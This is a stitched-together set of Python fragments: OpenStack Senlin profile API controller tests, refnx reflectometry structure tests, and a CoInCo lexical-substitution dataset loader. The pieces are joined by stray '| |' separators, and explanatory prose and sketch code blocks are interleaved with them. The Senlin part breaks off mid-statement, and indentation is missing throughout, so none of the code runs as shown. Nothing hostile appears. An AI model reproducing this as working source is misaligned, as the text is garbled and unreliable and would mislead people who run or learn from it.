'ProfileListRequest', req,
{
'sort': 'name:asc',
'name': ['foo'],
'limit': '20',
'marker': marker_uuid,
'type': ['fake_type'],
'project_safe': True
})
mock_call.assert_called_once_with(req.context, 'profile_list', obj)
@mock.patch.object(util, 'parse_request')
@mock.patch.object(rpc_client.EngineClient, 'call')
def test_profile_index_whitelist_bad_params(self, mock_call, mock_parse,
mock_enforce):
self._mock_enforce_setup(mock_enforce, 'index', True)
params = {
'balrog': 'fake_value'
}
req = self._get('/profiles', params=params)
ex = self.assertRaises(exc.HTTPBadRequest,
self.controller.index, req)
self.assertEqual("Invalid parameter balrog", six.text_type(ex))
self.assertFalse(mock_parse.called)
self.assertFalse(mock_call.called)
@mock.patch.object(util, 'parse_request')
@mock.patch.object(rpc_client.EngineClient, 'call')
def test_profile_index_global_project_not_bool(self, mock_call,
mock_parse, mock_enforce):
self._mock_enforce_setup(mock_enforce, 'index', True)
params = {'global_project': 'No'}
req = self._get('/profiles', params=params)
ex = self.assertRaises(exc.HTTPBadRequest,
self.controller.index, req)
self.assertEqual("Invalid value 'No' specified for 'global_project'",
six.text_type(ex))
self.assertFalse(mock_parse.called)
self.assertFalse(mock_call.called)
@mock.patch.object(util, 'parse_request')
@mock.patch.object(rpc_client.EngineClient, 'call')
def test_profile_index_limit_non_int(self, mock_call, mock_parse,
mock_enforce):
self._mock_enforce_setup(mock_enforce, 'index', True)
params = {'limit': 'abc'}
req = self._get('/profiles', params=params)
mock_parse.side_effect = exc.HTTPBadRequest("bad limit")
ex = self.assertRaises(exc.HTTPBadRequest,
self.controller.index, req)
self.assertEqual("bad limit", six.text_type(ex))
mock_parse.assert_called_once_with(
'ProfileListRequest', req, mock.ANY)
self.assertFalse(mock_call.called)
def test_profile_index_denied_policy(self, mock_enforce):
self._mock_enforce_setup(mock_enforce, 'index', False)
req = self._get('/profiles')
resp = shared.request_with_middleware(fault.FaultWrapper,
self.controller.index,
req)
self.assertEqual(403, resp.status_int)
self.assertIn('403 Forbidden', six.text_type(resp))
@mock.patch.object(util, 'parse_request')
@mock.patch.object(rpc_client.EngineClient, 'call')
def test_profile_create_success(self, mock_call, mock_parse,
mock_enforce):
self._mock_enforce_setup(mock_enforce, 'create', True)
body = {
'profile': {
'name': 'test_profile',
'spec': {
'type': 'test_profile_type',
'version': '1.0',
'properties': {
'param_1': 'value1',
'param_2': 2,
},
},
'metadata': {},
}
}
engine_response = {
'id': 'xxxx-yyyy-zzzz',
'name': 'test_profile',
'type': 'test_profile_type',
'spec': {
'type': 'test_profile_type',
'version': '1.0',
'properties': {
'param_1': 'value1',
'param_2': 2,
}
},
'metadata': {},
}
req = self._post('/profiles', jsonutils.dumps(body))
mock_call.return_value = engine_response
obj = mock.Mock()
mock_parse.return_value = obj
resp = self.controller.create(req, body=body)
self.assertEqual(engine_response, resp['profile'])
mock_parse.assert_called_once_with(
'ProfileCreateRequest', req, body, 'profile')
mock_call.assert_called_once_with(
req.context, 'profile_create', obj)
@mock.patch.object(util, 'parse_request')
@mock.patch.object(rpc_client.EngineClient, 'call')
def test_profile_create_with_no_profile(self, mock_call, mock_parse,
mock_enforce):
self._mock_enforce_setup(mock_enforce, 'create', True)
body = {'name': 'test_profile'}
req = self._post('/profiles', jsonutils.dumps(body))
mock_parse.side_effect = exc.HTTPBadRequest("bad body")
ex = self.assertRaises(exc.HTTPBadRequest,
self.controller.create,
req, body=body)
self.assertEqual("bad body", six.text_type(ex))
mock_parse.assert_called_once_with(
'ProfileCreateRequest', mock.ANY, body, 'profile')
self.assertFalse(mock_call.called)
@mock.patch.object(util, 'parse_request')
@mock.patch.object(rpc_client.EngineClient, 'call')
def test_profile_create_with_profile_no_spec(self, mock_call,
mock_parse, mock_enforce):
self._mock_enforce_setup(mock_enforce, 'create', True)
body = {'profile': {'name': 'test_profile'}}
req = self._post('/profiles', jsonutils.dumps(body))
mock_parse.side_effect = exc.HTTPBadRequest("miss spec")
ex = self.assertRaises(exc.HTTPBadRequest,
self.controller.create,
req, body=body)
self.assertEqual("miss spec", six.text_type(ex))
mock_parse.assert_called_once_with(
'ProfileCreateRequest', mock.ANY, body, 'profile')
self.assertFalse(mock_call.called)
@mock.patch.object(util, 'parse_request')
@mock.patch.object(rpc_client.EngineClient, 'call')
def test_profile_create_with_bad_type(self, mock_call,
mock_parse, mock_enforce):
self._mock_enforce_setup(mock_enforce, 'create', True)
type_name = 'unknown_type'
body = {
'profile': {
'name': 'test_profile',
'spec': {
'type': type_name,
'version': '1.0',
'properties': {'param': 'value'},
},
'metadata': {},
}
}
req = self._post('/profiles', jsonutils.dumps(body))
obj = mock.Mock()
mock_parse.return_value = obj
error = senlin_exc.ResourceNotFound(type='profile_type', id=type_name)
mock_call.side_effect = shared.to_remote_error(error)
resp = shared.request_with_middleware(fault.FaultWrapper,
self.controller.create,
req, body=body)
self.assertEqual(404, resp.json['code'])
self.assertEqual('ResourceNotFound', resp.json['error']['type'])
mock_parse.assert_called_once_with(
'ProfileCreateRequest', mock.ANY, body, 'profile')
mock_call.assert_called_once_with(
req.context, 'profile_create', obj)
@mock.patch.object(util, 'parse_request')
@mock.patch.object(rpc_client.EngineClient, 'call')
def test_profile_create_with_spec_validation_failed(self, mock_call,
mock_parse,
mock_enforce):
self._mock_enforce_setup(mock_enforce, 'create', True)
body = {
'profile': {
'name': 'test_profile',
'spec': {
'type': 'test_profile_type',
'version': '1.0',
'properties': {'param': 'value'},
},
'metadata': {},
}
}
req = self._post('/profiles', jsonutils.dumps(body))
obj = mock.Mock()
mock_parse.return_value = obj
msg = 'Spec validation error (param): value'
error = senlin_exc.InvalidSpec(message=msg)
mock_call.side_effect = shared.to_remote_error(error)
resp = shared.request_with_middleware(fault.FaultWrapper,
self.controller.create,
req, body=body)
self.assertEqual(400, resp.json['code'])
self.assertEqual('InvalidSpec', resp.json['error']['type'])
mock_parse.assert_called_once_with(
'ProfileCreateRequest', mock.ANY, body, 'profile')
mock_call.assert_called_once_with(
req.context, 'profile_create', obj)
def test_profile_create_denied_policy(self, mock_enforce):
self._mock_enforce_setup(mock_enforce, 'create', False)
body = {
'profile': {
'name': 'test_profile',
'spec': {
'type': 'test_profile_type',
'version': '1.0',
'properties': {'param': 'value'},
}
}
}
req = self._post('/profiles', jsonutils.dumps(body))
resp = shared.request_with_middleware(fault.FaultWrapper,
self.controller.create,
req)
self.assertEqual(403, resp.status_int)
self.assertIn('403 Forbidden', six.text_type(resp))
@mock.patch.object(util, 'parse_request')
@mock.patch.object(rpc_client.EngineClient, 'call')
def test_profile_get_normal(self, mock_call, mock_parse, mock_enforce):
self._mock_enforce_setup(mock_enforce, 'get', True)
pid = 'aaaa-bbbb-cccc'
req = self._get('/profiles/%(profile_id)s' % {'profile_id': pid})
engine_resp = {
u'id': u'aaaa-bbbb-cccc',
u'name': u'profile-1',
u'type': u'test_profile_type',
u'spec': {
u'param_1': u'value1',
u'param_2': u'value2',
},
u'created_time': u'2015-02-24T19:17:22Z',
u'updated_time': None,
u'metadata': {},
}
mock_call.return_value = engine_resp
obj = mock.Mock()
mock_parse.return_value = obj
result = self.controller.get(req, profile_id=pid)
self.assertEqual(engine_resp, result['profile'])
mock_parse.assert_called_once_with(
'ProfileGetRequest', req, {'identity': pid})
mock_call.assert_called_once_with(
req.context, 'profile_get', obj)
@mock.patch.object(util, 'parse_request')
@mock.patch.object(rpc_client.EngineClient, 'call')
def test_profile_get_not_found(self, mock_call, mock_parse,
mock_enforce):
self._mock_enforce_setup(mock_enforce, 'get', True)
pid = 'non-existent-profile'
req = self._get('/profiles/%(profile_id)s' % {'profile_id': pid})
error = senlin_exc.ResourceNotFound(type='profile', id=pid)
mock_call.side_effect = shared.to_remote_error(error)
obj = mock.Mock()
mock_parse.return_value = obj
resp = shared.request_with_middleware(fault.FaultWrapper,
self.controller.get,
req, profile_id=pid)
self.assertEqual(404, resp.json['code'])
self.assertEqual('ResourceNotFound', resp.json['error']['type'])
mock_parse.assert_called_once_with(
'ProfileGetRequest', mock.ANY, {'identity': pid})
mock_call.assert_called_once_with(
req.context, 'profile_get', obj)
def test_profile_get_denied_policy(self, mock_enforce):
self._mock_enforce_setup(mock_enforce, 'get', False)
pid = 'non-existent-profile'
req = self._get('/profiles/%(profile_id)s' % {'profile_id': pid})
resp = shared.request_with_middleware(fault.FaultWrapper,
self.controller.get,
req, profile_id=pid)
self.assertEqual(403, resp.status_int)
self.assertIn('403 Forbidden', six.text_type(resp))
@mock.patch.object(util, 'parse_request')
@mock.patch.object(rpc_client.EngineClient, 'call')
def test_profile_update_normal(self, mock_call, mock_parse,
mock_enforce):
self._mock_enforce_setup(mock_enforce, 'update', True)
pid = 'aaaa-bbbb-cccc'
body = {
'profile': {
'name': 'profile-2',
'metadata': {
'author': '<NAME>',
}
}
}
req = self._put('/profiles/%(profile_id)s' % {'profile_id': pid},
jsonutils.dumps(body))
engine_resp = {
u'id': pid,
u'name': u'profile-2',
u'type': u'test_profile_type',
u'created_time': u'2015-02-25T16:20:13Z',
u'updated_time': None,
u'metadata': {u'author': u'<NAME>'},
}
mock_call.return_value = engine_resp
obj = mock.Mock()
mock_parse.return_value = obj
result = self.controller.update(req, profile_id=pid, body=body)
self.assertEqual(engine_resp, result['profile'])
mock_parse.assert_called_once_with(
'ProfileUpdateRequest', req, mock.ANY)
mock_call.assert_called_once_with(
req.context, 'profile_update', obj)
@mock.patch.object(util, 'parse_request')
@mock.patch.object(rpc_client.EngineClient, 'call')
def test_profile_update_no_body(self, mock_call, mock_parse,
mock_enforce):
self._mock_enforce_setup(mock_enforce, 'update', True)
pid = 'aaaa-bbbb-cccc'
body = {'foo': 'bar'}
req = self._put('/profiles/%(profile_id)s' % {'profile_id': pid},
jsonutils.dumps(body))
mock_parse.side_effect = exc.HTTPBadRequest("bad body")
ex = self.assertRaises(exc.HTTPBadRequest,
self.controller.update,
req, profile_id=pid, body=body)
self.assertEqual("Malformed request data, missing 'profile' key "
"in request body.", six.text_type(ex))
self.assertFalse(mock_parse.called)
self.assertFalse(mock_call.called)
@mock.patch.object(util, 'parse_request')
@mock.patch.object(rpc_client.EngineClient, 'call')
def test_profile_update_no_name(self, mock_call, mock_parse,
mock_enforce):
self._mock_enforce_setup(mock_enforce, 'update', True)
pid = 'aaaa-bbbb-cccc'
body = {
'profile': {'metadata': {'author': '<NAME>'}}
}
req = self._put('/profiles/%(profile_id)s' % {'profile_id': pid},
jsonutils.dumps(body))
mock_call.return_value = {}
obj = mock.Mock()
mock_parse.return_value = obj
result = self.controller.update(req, profile_id=pid, body=body)
self.assertEqual({}, result['profile'])
mock_parse.assert_called_once_with(
'ProfileUpdateRequest', req, mock.ANY)
mock_call.assert_called_once_with(
req.context, 'profile_update', obj)
@mock.patch.object(util, 'parse_request')
@mock.patch.object(rpc_client.EngineClient, 'call')
def test_profile_update_with_unexpected_field(self, mock_call,
mock_parse, mock_enforce):
self._mock_enforce_setup(mock_enforce, 'update', True)
pid = 'aaaa-bbbb-cccc'
body = {
'profile': {
'name': 'new_profile',
'metadata': {'author': '<NAME>'},
'foo': 'bar'
}
}
req = self._put('/profiles/%(profile_id)s' % {'profile_id': pid},
jsonutils.dumps(body))
mock_parse.side_effect = exc.HTTPBadRequest("bad param")
ex = self.assertRaises(exc.HTTPBadRequest,
self.controller.update,
req, profile_id=pid, body=body)
self.assertEqual("bad param", six.text_type(ex))
mock_parse.assert_called_once_with(
'ProfileUpdateRequest', req, mock.ANY)
self.assertFalse(mock_call.called)
@mock.patch.object(util, 'parse_request')
@mock.patch.object(rpc_client.EngineClient, 'call')
def test_profile_update_not_found(self, mock_call, mock_parse,
mock_enforce):
self._mock_enforce_setup(mock_enforce, 'update', True)
pid = 'non-existent-profile'
body = {
'profile': {
'name': 'new_profile',
'metadata': {'author': '<NAME>'},
}
}
req = self._put('/profiles/%(profile_id)s' % {'profile_id': pid},
jsonutils.dumps(body))
error = senlin_exc.ResourceNotFound(type='profile', id=pid)
mock_call.side_effect = shared.to_remote_error(error)
resp = shared.request_with_middleware(fault.FaultWrapper,
self.controller.update,
req, profile_id=pid,
body=body)
self.assertEqual(404, resp.json['code'])
self.assertEqual('ResourceNotFound', resp.json['error']['type'])
def test_profile_update_denied_policy(self, mock_enforce):
self._mock_enforce_setup(mock_enforce, 'update', False)
pid = 'aaaa-bbbb-cccc'
body = {
'profile': {'name': 'test_profile', 'spec': {'param5': 'value5'}},
}
req = self._put('/profiles/%(profile_id)s' % {'profile_id': pid},
jsonutils.dumps(body))
resp = shared.request_with_middleware(fault.FaultWrapper,
self.controller.update,
req, profile_id=pid,
body=body)
self.assertEqual(403, resp.status_int)
self.assertIn('403 Forbidden', six.text_type(resp))
@mock.patch.object(util, 'parse_request')
@mock.patch.object(rpc_client.EngineClient, 'call')
def test_profile_delete_success(self, mock_call, mock_parse,
mock_enforce):
self._mock_enforce_setup(mock_enforce, 'delete', True)
pid = 'aaaa-bbbb-cccc'
req = self._delete('/profiles/%(profile_id)s' % {'profile_id': pid})
obj = mock.Mock()
mock_parse.return_value = obj
self.assertRaises(exc.HTTPNoContent,
self.controller.delete, req, profile_id=pid)
mock_parse.assert_called_once_with(
'ProfileDeleteRequest', req, {'identity': pid})
mock_call.assert_called_once_with(req.context, 'profile_delete', obj)
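Each test above follows the same recipe: patch `util.parse_request` and `EngineClient.call`, invoke the controller, then assert on the recorded call arguments. A self-contained sketch of that recipe using only `unittest.mock` (the classes and function here are hypothetical stand-ins, not Senlin's real ones):

```python
from unittest import mock

class EngineClient:
    # stand-in for senlin.rpc.client.EngineClient
    def call(self, context, action, obj):
        raise RuntimeError("real RPC must never run in a unit test")

def delete_profile(client, context, obj):
    return client.call(context, 'profile_delete', obj)

with mock.patch.object(EngineClient, 'call') as mock_call:
    mock_call.return_value = None
    obj = mock.Mock()
    delete_profile(EngineClient(), 'ctx', obj)
    # the patched method records exactly how it was invoked
    mock_call.assert_called_once_with('ctx', 'profile_delete', obj)
```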
@mock.patch.object(util, 'parse_request')
@mock.patch.object(rpc_client.EngineClient, 'call')
def test_profile_delete_not_found(self, mock_call, mock_parse,
mock_enforce):
self._mock_enforce_setup(mock_enforce, 'delete', True)
pid = 'aaaa-bbbb-cccc'
req = self._delete('/profiles/%(profile_id)s' % {'profile_id': pid})
error | |
import pickle
import numpy as np
from numpy.testing import (
assert_almost_equal,
assert_equal,
assert_,
assert_allclose,
)
from scipy.stats import cauchy
from refnx._lib import flatten
from refnx.reflect import (
SLD,
Structure,
Spline,
Slab,
Stack,
Erf,
Linear,
Exponential,
Interface,
MaterialSLD,
MixedSlab,
)
from refnx.reflect.structure import _profile_slicer
from refnx.analysis import Parameter, Interval, Parameters
from refnx.analysis.parameter import _BinaryOp
class TestStructure:
def setup_method(self):
self.air = SLD(0, name="air")
self.sio2 = SLD(3.47, name="sio2")
self.d2o = SLD(6.36, name="d2o")
self.h2o = SLD(-0.56, name="h2o")
self.s = self.air | self.sio2(100, 5) | self.d2o(0, 4)
def test_structure_construction(self):
# structures are constructed by or-ing slabs
# test that the slab representation is correct
assert_equal(
self.s.slabs(),
np.array(
[[0, 0, 0, 0, 0], [100, 3.47, 0, 5, 0], [0, 6.36, 0, 4, 0]]
),
)
self.s[1] = SLD(3.47 + 1j, name="sio2")(100, 5)
self.s[1].vfsolv.value = 0.9
oldpars = len(list(flatten(self.s.parameters)))
# slabs have solvent penetration
self.s.solvent = SLD(5 + 1.2j)
sld = 5 * 0.9 + 0.1 * 3.47
sldi = 1 * 0.1 + 0.9 * 1.2
assert_almost_equal(
self.s.slabs(),
np.array(
[[0, 0, 0, 0, 0], [100, sld, sldi, 5, 0.9], [0, 6.36, 0, 4, 0]]
),
)
# when the structure._solvent is not None, but an SLD object, then
# its number of parameters should increase by 2.
newpars = len(list(flatten(self.s.parameters)))
assert_equal(newpars, oldpars + 2)
# by default solvation is done by backing medium
self.s.solvent = None
sld = 6.36 * 0.9 + 0.1 * 3.47
sldi = 1 * 0.1
assert_almost_equal(
self.s.slabs(),
np.array(
[[0, 0, 0, 0, 0], [100, sld, sldi, 5, 0.9], [0, 6.36, 0, 4, 0]]
),
)
# by default solvation is done by backing medium, except when structure
# is reversed
self.s.reverse_structure = True
sld = 0 * 0.9 + 0.1 * 3.47
sldi = 0 * 0.9 + 1 * 0.1
assert_almost_equal(
self.s.slabs(),
np.array(
[[0, 6.36, 0, 0, 0], [100, sld, sldi, 4, 0.9], [0, 0, 0, 5, 0]]
),
)
def test_interface(self):
# can we set the interface property correctly
c = self.sio2(10, 3)
assert c.interfaces is None
c.interfaces = Erf()
assert isinstance(c.interfaces, Erf)
c.interfaces = [Erf()]
assert isinstance(c.interfaces, Erf)
c.interfaces = None
assert c.interfaces is None
import pytest
with pytest.raises(ValueError):
c.interfaces = [1]
# because len(c.slabs()) = 1
with pytest.raises(ValueError):
c.interfaces = [Erf(), Erf()]
def test_mixed_slab(self):
m = MixedSlab(
10.0,
[1, 2 + 0.1j, 3.0 + 1j],
[0.1, 0.2, 0.3],
10.0,
vfsolv=0.1,
interface=Linear(),
name="pop",
)
slabs = m.slabs()
assert_allclose(slabs[0, 0], 10.0)
assert_allclose(slabs[0, 1], 2.3333333333333333)
assert_allclose(slabs[0, 2], 0.5333333333333333)
assert_allclose(slabs[0, 3], 10.0)
assert_allclose(slabs[0, 4], 0.1)
assert_equal(float(m.vfsolv), 0.1)
assert m.name == "pop"
# test the repr
q = eval(repr(m))
slabs = q.slabs()
assert_allclose(slabs[0, 0], 10.0)
assert_allclose(slabs[0, 1], 2.3333333333333333)
assert_allclose(slabs[0, 2], 0.5333333333333333)
assert_allclose(slabs[0, 3], 10.0)
assert_allclose(slabs[0, 4], 0.1)
assert_equal(float(q.vfsolv), 0.1)
def test_micro_slab(self):
# test micro-slab representation by calculating reflectivity from a
# structure with default interfacial profiles for all the components.
# Then specify an Erf interface for the slab and check that the
# reflectivity signal is the same.
sio2 = self.sio2(100, 5)
d2o = self.d2o(0, 4)
s = self.air | sio2 | d2o
s.contract = -1
q = np.linspace(0.01, 0.5, 101)
reflectivity = s.reflectivity(q)
sio2.interfaces = Erf()
d2o.interfaces = Erf()
micro_slab_reflectivity = s.reflectivity(q)
# Should be within 1%
# How close the micro-slicing is to the Nevot-Croce is going to
# depend on the exact system you look at, and what slice thickness
# is used.
assert_allclose(micro_slab_reflectivity, reflectivity, rtol=0.01)
# test out user defined roughness type
class Cauchy(Interface):
def __call__(self, x, loc=0, scale=1):
return cauchy.cdf(x, loc=loc, scale=scale)
c = Cauchy()
sio2.interfaces = c
s.reflectivity(q)
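The Cauchy class above shows the extension point: a user-defined roughness just needs a `__call__` that returns a CDF. A standalone sketch of the same idea with a logistic profile, using only the stdlib (the `Interface` base here is a stand-in for refnx's):

```python
import math

class Interface:
    # stand-in for refnx.reflect.Interface's role as a base class
    pass

class Logistic(Interface):
    def __call__(self, x, loc=0.0, scale=1.0):
        # logistic CDF: smooth, monotonic 0 -> 1 roughness profile
        return 1.0 / (1.0 + math.exp(-(x - loc) / scale))

prof = Logistic()
```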
# imaginary part of micro slab should be calculated in the same way as
# the real part
fronting = SLD(1 + 1j)
layer = SLD(4 + 4j)
backing = SLD(6 + 6j)
s = fronting | layer(100, 4) | backing(0, 4)
s[1].interfaces = Erf()
s[-1].interfaces = Erf()
slabs = s.slabs()
assert_almost_equal(slabs[:, 1], slabs[:, 2])
def test_pickle(self):
# need to be able to pickle and unpickle structure
pkl = pickle.dumps(self.s)
unpkl = pickle.loads(pkl)
assert_(isinstance(unpkl, Structure))
for param in unpkl.parameters.flattened():
assert_(isinstance(param, Parameter))
assert hasattr(unpkl, "_solvent")
def test_sld_profile(self):
# check that it runs
z, sld_profile = self.s.sld_profile()
assert_equal(np.size(z), 500)
z, sld_profile = self.s.sld_profile(max_delta_z=0.251)
delta_z = np.ediff1d(z)
assert delta_z[0] <= 0.251
z, sld_profile = self.s.sld_profile(np.linspace(-100, 100, 100))
assert_equal(min(z), -100)
assert_equal(max(z), 100)
def test_reflectivity(self):
q = np.linspace(0.005, 0.3, 200)
self.s.reflectivity(q)
def test_repr_sld(self):
p = SLD(5 + 1j, name="pop")
assert_equal(float(p.real), 5)
assert_equal(float(p.imag), 1)
print(repr(p))
q = eval(repr(p))
assert_equal(float(q.real), 5)
assert_equal(float(q.imag), 1)
def test_repr_materialsld(self):
p = MaterialSLD("SiO2", density=2.2, name="silica")
sldc = complex(p)
assert_allclose(sldc.real, 3.4752690258246504)
assert_allclose(sldc.imag, 1.0508799522721932e-05)
print(repr(p))
q = eval(repr(p))
sldc = complex(q)
assert_allclose(sldc.real, 3.4752690258246504)
assert_allclose(sldc.imag, 1.0508799522721932e-05)
def test_materialsld(self):
p = MaterialSLD("SiO2", density=2.2, name="silica")
sldc = complex(p)
assert_allclose(sldc.real, 3.4752690258246504)
assert_allclose(sldc.imag, 1.0508799522721932e-05)
assert p.probe == "neutron"
# is X-ray SLD correct?
p.wavelength = 1.54
p.probe = "x-ray"
sldc = complex(p)
assert_allclose(sldc.real, 18.864796064009866)
assert_allclose(sldc.imag, 0.2436013463223236)
assert len(p.parameters) == 1
assert p.formula == "SiO2"
# the density value should change the SLD
p.probe = "neutron"
p.density.value = 4.4
sldc = complex(p)
assert_allclose(sldc.real, 3.4752690258246504 * 2)
assert_allclose(sldc.imag, 1.0508799522721932e-05 * 2)
# should be able to make a Slab from MaterialSLD
slab = p(10, 3)
assert isinstance(slab, Slab)
slab = Slab(10, p, 3)
assert isinstance(slab, Slab)
# make a full structure and check that the reflectivity calc works
air = SLD(0)
sio2 = MaterialSLD("SiO2", density=2.2)
si = MaterialSLD("Si", density=2.33)
s = air | sio2(10, 3) | si(0, 3)
s.reflectivity(np.linspace(0.005, 0.3, 100))
p = s.parameters
assert len(list(flatten(p))) == 5 + 4 + 4
def test_repr_slab(self):
p = SLD(5 + 1j)
t = p(10.5, 3.0)
t.vfsolv = 0.1
t.interfaces = Linear()
q = eval(repr(t))
assert isinstance(q, Slab)
assert_equal(float(q.thick), 10.5)
assert_equal(float(t.sld.real), 5)
assert_equal(float(t.sld.imag), 1)
assert_equal(float(q.vfsolv), 0.1)
assert isinstance(q.interfaces, Linear)
t.name = "pop"
q = eval(repr(t))
assert t.name == q.name
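Several tests here rely on the `eval(repr(obj))` round-trip: `__repr__` must emit a constructor expression that rebuilds an equivalent object. A minimal sketch with a hypothetical class (not refnx's real Slab):

```python
class Slab:
    # hypothetical: only enough state to demonstrate the round-trip
    def __init__(self, thick, rough, name=""):
        self.thick = thick
        self.rough = rough
        self.name = name

    def __repr__(self):
        # emit a valid constructor call so eval() can rebuild the object
        return "Slab({0!r}, {1!r}, name={2!r})".format(
            self.thick, self.rough, self.name)

t = Slab(10.5, 3.0, name="pop")
q = eval(repr(t))
```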
def test_repr_structure(self):
p = SLD(5 + 1j)
t = p(10.5, 3.0)
t.vfsolv = 0.1
s = t | t
q = eval(repr(s))
assert isinstance(q, Structure)
assert_equal(float(q[0].thick), 10.5)
assert_equal(float(q[1].sld.real), 5)
assert_equal(float(q[1].sld.imag), 1)
s.name = "pop"
q = eval(repr(s))
assert hasattr(q, "_solvent")
assert s.name == q.name
def test_sld(self):
p = SLD(5 + 1j, name="pop")
assert_equal(float(p.real), 5)
assert_equal(float(p.imag), 1)
# test that we can cast to complex
assert_equal(complex(p), 5 + 1j)
p = SLD(5)
assert_equal(float(p.real), 5)
q = Parameter(5)
r = Parameter(1)
p = SLD([q, r])
assert_equal(float(p.real), 5)
assert_equal(float(p.imag), 1)
# use SLD to make a Slab
thickness = Parameter(100)
roughness = Parameter(3.0)
vfsolv = Parameter(0.2)
s = p(thickness, roughness)
assert_equal(s.thick.value, thickness.value)
assert_equal(s.rough.value, roughness.value)
assert_equal(s.vfsolv.value, 0)
s = p(thickness, roughness, vfsolv)
assert_equal(s.thick.value, thickness.value)
assert_equal(s.rough.value, roughness.value)
assert_equal(s.vfsolv.value, vfsolv.value)
# check that we can construct SLDs from a constrained par
deut_par = Parameter(6.36)
h2o_solvent = SLD(-0.56)
ms_val = 0.6 * deut_par + 0.4 * h2o_solvent.real
mixed_solvent = SLD(ms_val)
assert isinstance(mixed_solvent.real, _BinaryOp)
sld = complex(mixed_solvent)
assert_allclose(sld.real, 0.6 * 6.36 + 0.4 * -0.56)
deut_par.value = 5.0
sld = complex(mixed_solvent)
assert_allclose(sld.real, 0.6 * 5.0 + 0.4 * -0.56)
def test_sld_slicer(self):
q = np.linspace(0.005, 0.2, 100)
reflectivity = self.s.reflectivity(q)
z, sld = self.s.sld_profile(z=np.linspace(-150, 250, 1000))
round_trip_structure = _profile_slicer(z, sld, slice_size=0.5)
round_trip_reflectivity = round_trip_structure.reflectivity(q)
assert_allclose(round_trip_reflectivity, reflectivity, rtol=0.004)
def test_slab_addition(self):
# The slabs method for the main Structure component constructs
# the overall slabs by concatenating Component slabs. This checks that
# the slab concatenation is correct.
si = SLD(2.07)
sio2 = SLD(3.47)
polymer = SLD(1.5)
d2o = SLD(6.36)
d2o_layer = d2o(0, 3)
polymer_layer = polymer(20, 3)
a = Spline(400, [4, 5.9], [0.2, 0.4], zgrad=True)
film = si | sio2(10, 3) | polymer_layer | a | d2o_layer
film.sld_profile()
structure = si(0, 0)
for i in range(200):
p = SLD(i)(i, i)
structure |= p
structure |= d2o(0, 3)
slabs = structure.slabs()
assert_equal(slabs[1:-1, 0], np.arange(200))
assert_equal(slabs[1:-1, 1], np.arange(200))
assert_equal(slabs[1:-1, 3], np.arange(200))
assert_equal(slabs[-1, 1], 6.36)
assert_equal(slabs[0, 1], 2.07)
assert_equal(len(slabs), 202)
def test_component_mul(self):
si = SLD(2.07)
sio2 = SLD(3.47)
polymer = SLD(1.5)
d2o = SLD(6.36)
s = si | sio2(10, 3) | polymer(100, 3) * 5 | d2o(0, 3)
slabs = s.slabs()
assert_almost_equal(np.sum(slabs[:, 0]), 510)
s = polymer(100, 3) * 5
assert isinstance(s, Structure)
slabs = s.slabs()
assert_almost_equal(np.sum(slabs[:, 0]), | |
# Load and cache XML
global _COINCO_XML
if _COINCO_XML is None:
with gzip.open(ASSETS['coinco_patched']['fp'], 'r') as f:
_COINCO_XML = BeautifulSoup(f.read(), 'xml')
# Load and cache splits
global _COINCO_DEV_IDS
global _COINCO_TEST_IDS
if _COINCO_DEV_IDS is None:
assert _COINCO_TEST_IDS is None
with open(ASSETS['coinco_devids']['fp'], 'r') as f:
_COINCO_DEV_IDS = set([int(i) for i in f.read().strip().splitlines()])
with open(ASSETS['coinco_testids']['fp'], 'r') as f:
_COINCO_TEST_IDS = set([int(i) for i in f.read().strip().splitlines()])
assert len(_COINCO_DEV_IDS) == 10179
assert len(_COINCO_TEST_IDS) == 5450
assert len(_COINCO_DEV_IDS.intersection(_COINCO_TEST_IDS)) == 0
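The assertions above encode the split invariants: fixed sizes and no id shared between dev and test. The disjointness check is just a set intersection; a tiny sketch with illustrative ids (not the real CoInCo counts):

```python
def check_disjoint_splits(dev_ids, test_ids):
    # splits must not share any instance id
    overlap = dev_ids & test_ids
    if overlap:
        raise ValueError("splits overlap on {} ids".format(len(overlap)))
    return True

ok = check_disjoint_splits({1, 2, 3}, {4, 5})
```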
# Load, parse and cache candidates
global _COINCO_ID_TO_MELAMUD_CANDIDATES
if include_negatives and _COINCO_ID_TO_MELAMUD_CANDIDATES is None:
_COINCO_ID_TO_MELAMUD_CANDIDATES = {}
with open(ASSETS['coinco_melamud_candidates']['fp'], 'r', encoding='ISO-8859-1') as f:
lines = f.read().strip().splitlines()
melamud_k_to_candidates = {}
for l in lines:
k, candidates = l.split('::')
assert k not in melamud_k_to_candidates
candidates = set([s.strip() for s in candidates.split(';') if len(s.strip()) > 0])
melamud_k_to_candidates[k] = candidates
with open(ASSETS['coinco_melamud_preprocessed']['fp'], 'r', encoding='ISO-8859-1') as f:
lines = f.read().strip().splitlines()
for l in lines:
k, coinco_id, _, _ = l.split('\t', 3)
coinco_id = int(coinco_id)
if k != '..N':
assert coinco_id not in _COINCO_ID_TO_MELAMUD_CANDIDATES
_COINCO_ID_TO_MELAMUD_CANDIDATES[coinco_id] = melamud_k_to_candidates[k]
assert len(_COINCO_ID_TO_MELAMUD_CANDIDATES) == 15414
# Create dataset
d = LexSubDataset(substitutes_lemmatized=True)
for context_index, context_el in enumerate(_COINCO_XML.find_all('sent')):
# Determine split
masc_fn = context_el.attrs['MASCfile']
if masc_fn in _COINCO_DEV_SOURCE_FILES:
coinco_split = 'dev'
unofficial_split = 'train' if masc_fn in _COINCO_DEV_UNOFFICIAL_TRAIN_SOURCE_FILES else 'valid'
else:
coinco_split = 'test'
unofficial_split = 'test'
if split not in [coinco_split, unofficial_split]:
continue
# Align context to original MASC 2.0.0 source
masc_region_id = context_el.attrs['MASCsentID']
masc_txt, region_bounds, context_bounds = _coinco_masc_fn_and_region_id_to_text_and_bounds(masc_fn, masc_region_id)
# Choose to use original context from CoInCo or repaired one from MASC
if repair_context:
region = masc_txt[region_bounds[0]:region_bounds[1]]
if include_surrounding_context:
context_str = masc_txt[context_bounds[0]:context_bounds[1]]
region_offset_in_context = region_bounds[0] - context_bounds[0]
else:
context_str = region
region_offset_in_context = 0
else:
region = normalize_text(context_el.find('targetsentence').text)
if include_surrounding_context:
s_pre = normalize_text(context_el.find('precontext').text)
s_post = normalize_text(context_el.find('postcontext').text)
s = []
if len(s_pre) > 0:
s.append(s_pre)
s_raw_i = len(s)
s.append(region)
if len(s_post) > 0:
s.append(s_post)
context_str = ' '.join(s)
region_offset_in_context = tokens_offsets(context_str, s)[s_raw_i]
else:
context_str = region
region_offset_in_context = 0
assert region_offset_in_context >= 0
# Tokenize
region_tokens_els = context_el.find_all('token')
region_tokens = [t.attrs['wordform'].strip() for t in region_tokens_els]
